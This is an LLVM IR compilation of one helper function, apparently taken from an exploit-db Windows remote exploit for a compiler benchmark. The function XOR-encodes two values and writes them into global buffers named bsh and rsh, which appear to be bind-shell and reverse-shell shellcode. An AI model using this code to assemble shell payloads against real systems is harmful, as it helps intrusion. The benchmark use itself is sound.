; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_297.c_setoff.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_297.c_setoff.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@bsh = common dso_local global i64 0, align 8
@rsh = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @setoff(i64 %0, i64 %1) #0 {
  %3 = alloca i64, align 8
  %4 = alloca i64, align 8
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  store i64 %0, i64* %3, align 8
  store i64 %1, i64* %4, align 8
  %7 = load i64, i64* %3, align 8
  %8 = xor i64 %7, 3739147998
  %9 = trunc i64 %8 to i32
  store i32 %9, i32* %5, align 4
  %10 = load i64, i64* %4, align 8
  %11 = xor i64 %10, 3739147998
  %12 = trunc i64 %11 to i32
  store i32 %12, i32* %6, align 4
  %13 = load i64, i64* @bsh, align 8
  %14 = add nsw i64 %13, 29
  %15 = call i32 @memcpy(i64 %14, i32* %5, i32 4)
  %16 = load i64, i64* @bsh, align 8
  %17 = add nsw i64 %16, 46
  %18 = call i32 @memcpy(i64 %17, i32* %6, i32 4)
  %19 = load i64, i64* @rsh, align 8
  %20 = add nsw i64 %19, 29
  %21 = call i32 @memcpy(i64 %20, i32* %5, i32 4)
  %22 = load i64, i64* @rsh, align 8
  %23 = add nsw i64 %22, 46
  %24 = call i32 @memcpy(i64 %23, i32* %6, i32 4)
  ret void
}

declare dso_local i32 @memcpy(i64, i32*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
